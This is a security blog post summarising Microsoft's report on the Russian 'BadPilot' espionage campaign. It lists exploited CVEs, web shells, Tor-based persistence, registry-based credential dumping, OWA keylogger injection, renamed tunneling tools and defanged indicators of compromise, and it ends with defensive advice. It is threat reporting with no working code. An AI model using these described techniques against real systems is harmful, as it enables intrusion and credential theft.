- Vulnerable U
- Posts
- Russian Hackers Expand Global Cyber Espionage Campaign with "BadPilot" Operation
Russian Hackers Expand Global Cyber Espionage Campaign with "BadPilot" Operation
Microsoft revealed a multiyear cyber espionage campaign by Russian state-sponsored hackers. The operation has exploited critical infrastructure worldwide.
Matt Johansen
February 13, 2025
A Russian state-sponsored hacking group has carried out a multiyear cyber espionage operation targeting organizations worldwide, Microsoft security researchers revealed on Tuesday.
The campaign, dubbed “BadPilot”, was conducted by a subgroup of the Russian military intelligence hacking team Seashell Blizzard (also known as Sandworm).
I’m a sucker for a great Microsoft Threat Intel report! Let’s dig into this one.
Massive Global Targeting Across Critical Sectors
Microsoft’s threat intelligence team found that since at least 2021, the BadPilot subgroup has been compromising internet-facing infrastructure across multiple industries, including:
Energy, oil & gas
Telecommunications
Shipping & logistics
Arms manufacturing
International governments
While some attacks appeared opportunistic, Microsoft assessed that these compromises collectively provided Russian intelligence with strategic access to support evolving geopolitical objectives.
In particular, Microsoft linked at least three destructive cyberattacks in Ukraine since 2023 to the access gained through BadPilot operations.
Technical Breakdown: How BadPilot Gains and Maintains Access
BadPilot's operations heavily exploit known vulnerabilities in publicly exposed systems to gain initial access. Since early 2024, the group has expanded targeting to include U.S. and U.K. organizations, primarily by exploiting flaws in remote access and security software.
1. Exploited Vulnerabilities for Initial Access
BadPilot exploits a range of CVEs in widely used enterprise software, including:
Exploited Software | CVE(s) | Exploitation Details |
|---|---|---|
Microsoft Exchange | CVE-2021-34473 | ProxyShell RCE to drop web shells |
Zimbra Collaboration Suite | CVE-2022-41352 | Arbitrary file-write vulnerability enabling web shell deployment |
OpenFire Chat Server | CVE-2023-32315 | Exploited for unauthorized admin access |
JetBrains TeamCity CI/CD | CVE-2023-42793 | Used for software supply chain compromises |
Microsoft Outlook | CVE-2023-23397 | NTLM relay attack used for credential theft |
ConnectWise ScreenConnect | CVE-2024-1709 | Remote execution to deploy backdoors |
Fortinet FortiClient EMS | CVE-2023-48788 | Exploited for administrative control over security appliances |
JBoss | Unknown CVE | Used to execute arbitrary code on vulnerable systems |
2. Persistence Mechanisms
Once inside a system, BadPilot rapidly deploys web shells, remote monitoring software, and backdoors to maintain access. Key persistence methods include:
2.1. Web Shells for Command Execution
Deployed primarily on Microsoft Exchange and Zimbra servers
Identified web shell variant: "LocalOlive" (ASPX web shell supporting C#)
Capabilities:
File upload/download
Remote shell execution
Port forwarding (default: TCP 250)
Web shells allow attackers to maintain persistent access, execute commands remotely, and deploy additional tooling for lateral movement.
2.2. Remote Monitoring & Management (RMM) Software for C2
In early 2024, BadPilot began using legitimate RMM tools to maintain persistence while evading traditional malware detection. The attackers installed:
Atera Agent (retrieved via Bitsadmin/curl)
Splashtop Remote Services
By leveraging legitimate IT tools, the attackers blend into normal administrative traffic, making detection significantly harder.
2.3. "ShadowLink" Tor-Based Persistent Access
Microsoft identified a custom persistence mechanism, ShadowLink, which configures a compromised system as a Tor hidden service.
"ShadowLink facilitates persistent remote access by configuring a compromised system to be registered as a Tor hidden service," Microsoft researchers explained. "This allows Seashell Blizzard to bypass common exploit detection methods, making it harder for network administrators to track and eliminate access."
How it works:
Tor binaries are deployed to the compromised system
A custom
torrcconfiguration file registers the machine as a.onionserviceAttackers use Tor tunnels to bypass traditional network monitoring
Remote access is established via hidden RDP (3389) or SSH (22) services
Using Tor prevents traditional firewall and network monitoring systems from detecting traffic to known malicious IP addresses.
3. Credential Theft & Lateral Movement
BadPilot uses multiple techniques to escalate privileges and move laterally within victim networks:
3.1. NTLM Credential Theft via Outlook Exploitation (CVE-2023-23397)
Exploits NTLM relay attack in Microsoft Outlook
Captures hashed credentials for offline cracking or relay attacks
3.2. Registry-Based LSASS Dumping
Uses
reg.exeto extract credentials from HKLM\SAMAlternative method: Deploys a renamed version of
procdump.exe
3.3. Credential Harvesting via Malicious Login Portals
BadPilot modifies OWA login pages to inject JavaScript keyloggers
Captured credentials are exfiltrated to actor-controlled domains
Microsoft identified actor-controlled infrastructure used for this attack:
hwupdates[.]com
cloud-sync[.]org
103.201.129[.]130
4. Data Exfiltration & Network Expansion
Once inside, BadPilot deploys tunneling utilities to exfiltrate data and expand their access across the network.
4.1. Tunneling Tools Used:
Chisel (reverse SSH tunneling)
Plink (PuTTY-based tunneling)
rsockstun (SOCKS proxy for stealthy exfiltration)
Attackers rename tools to blend into legitimate system processes, using names like:
MsChSoft.exeMsNan.exeSys.exeMicrosoftExchange32.exe
Microsoft linked multiple VPS servers to BadPilot's data exfiltration activities:
Tunneling Server | Observed Active Period |
|---|---|
103.201.129[.]130 | May 2022 - July 2022 |
104.160.6[.]2 | September 2022 - December 2022 |
195.26.87[.]209 | September 2023 - April 2024 |
Geographical Scope Expands Beyond Ukraine
While BadPilot initially focused on Ukraine in 2022, its operations expanded globally in 2023. The hackers have since infiltrated organizations in the United States, Europe, Central Asia, and the Middle East.
In early 2024, the campaign sharpened its focus on targets in the United States, United Kingdom, Canada, and Australia, likely in response to shifting Russian intelligence priorities.
How Organizations Can Defend Themselves
Microsoft recommends organizations take the following steps to mitigate risk:
Apply security patches immediately for internet-facing systems.
Enable multi-factor authentication to protect against credential theft.
Monitor for indicators of compromise (IoCs) using threat intelligence from Microsoft.
Harden access controls to detect and block unauthorized remote connections.
To wrap, direct from the Microsoft report: “This subgroup, which is characterized within the broader Seashell Blizzard organization by its near-global reach, represents an expansion in both the geographical targeting conducted by Seashell Blizzard and the scope of its operations. At the same time, Seashell Blizzard’s far-reaching, opportunistic access methods likely offer Russia expansive opportunities for niche operations and activities that will continue to be valuable over the medium term.”
Read their full report for more Intel, and good threat hunting queries. - https://www.microsoft.com/en-us/security/blog/2025/02/12/the-badpilot-campaign-seashell-blizzard-subgroup-conducts-multiyear-global-access-operation/